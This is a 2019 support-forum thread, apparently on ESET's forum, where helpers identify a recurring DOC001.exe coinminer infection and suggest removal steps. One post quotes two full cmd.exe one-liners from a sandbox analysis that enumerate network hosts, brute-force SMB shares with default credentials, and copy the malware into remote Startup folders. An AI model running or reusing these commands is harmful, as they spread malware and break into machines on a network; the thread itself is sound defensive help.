Malware

Gerald KAmande · May 23, 2019

Been hit by DC002. Exe virus. Any help on how I can remove it

Marcos · May 23, 2019

Is that "DC002. Exe" a name of a file? Is it detected by ESET? If not, please submit it to ESET for analysis as per FAQ on the right-hand side of this forum.

Gerald KAmande · May 23, 2019

Sorry file name DC001.exc

Marcos · May 23, 2019

Have you also submitted logs as per the KB I referred to? Just knowing the file name doesn't tell anything.

Gerald KAmande · May 23, 2019

tried to send file ..but it cant be attached as its affected

itman · May 23, 2019

If the file is DOC001.exe, it is possible the .exe is a coinminer: https://malwaretips.com/blogs/remove-doc001-exe/ .

The first question is how did you know you were infected? Do you have Eset installed and it detected something? If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware.

Marcos · May 23, 2019

So is it detected by ESET or not? If it is, under what name? If not, please submit it to samples[at]eset.com in an archive encrypted with the password "infected".

Gerald KAmande · May 23, 2019

The first question is how did you know you were infected? i saw on drive C of most computers has that folder. even you delete it , it will re- appear again. Do you have Eset installed and it detected something? I have Eset installed but its not detecting If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so were can indentify the malware.

Gerald KAmande · May 23, 2019

https://malwaretips.com/blogs/remove-doc001-exe/ . i have tried it detects but the virus will still hit on those pcs

itman · May 23, 2019

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.

1 hour ago, Gerald KAmande said:

https://malwaretips.com/blogs/remove-doc001-exe/ . i have tried it detects but the virus will still hit on those pcs

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

Quote

When the scan has completed, you will be presented with a screen showing the malware infections that Malwarebytes has detected. To remove the malicious programs that Malwarebytes has found, click on the “Quarantine Selected” button.

Edited May 23, 2019 by itman

itman · May 23, 2019

There's a May 4, 2019 analysis of DOC001.exe at Malware-Analysis here: https://www.hybrid-analysis.com/sample/f23435192769e92a832e8eba0dd769fc50e23fb41f11cd647ea2c550520f2f68?environmentId=100 . AV detection of the malware is quite high. And it does maintain persistence in the various Win startup locations as noted below. Appears it is has loaded itself into every on of them!

Quote

cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 652)

cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temp\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temp\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 3880)

Gerald KAmande · May 24, 2019

19 hours ago, itman said:

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

i have uploaded the file attached see theresults

Marcos · May 24, 2019

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan
NsCpuCNMiner32.exe - a variant of Win32/CoinMiner.DQ potentially unwanted application
NsCpuCNMiner64.exe - a variant of Win64/CoinMiner.CZ potentially unwanted application

The first one is a NSIS archive, the detection was added in April 2018. The other 2 executables (PUAs) are inside the NSIS archive, the detection was added in July 2017.

itman · May 24, 2019

1 hour ago, Marcos said:

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan

TrendMicro has an article on how to permanently remove this coinminer here: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_coinminer.inj . It does require some manual cleaning activities. Click on the "Solution" section. Substitute the "scan with TrendMicro" with a full in-depth scan using Eset Smart Security.

If the above is too technically advanced for you, contract your regional Eset support concern for assistance: https://www.eset.com/int/

itman · May 24, 2019

For reference, SANS has an article on a malware sample using the NSIS installer here: https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ .

I believe this particular coinminer malware was deployed via a self-executing SFX archive using something along this line: https://gist.github.com/xymopen/951ef3d5301af55efd82eb67af129066 .

Make sure Eset's PUA protection is always enabled and don't ignore the warnings generated from it. It is far easier to prevent malware/nuisance-ware from being installed than trying to remove it later.

Edited May 24, 2019 by itman

Sign In

Malware

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Recently Browsing 0 members

Quick search

FAQ

Topics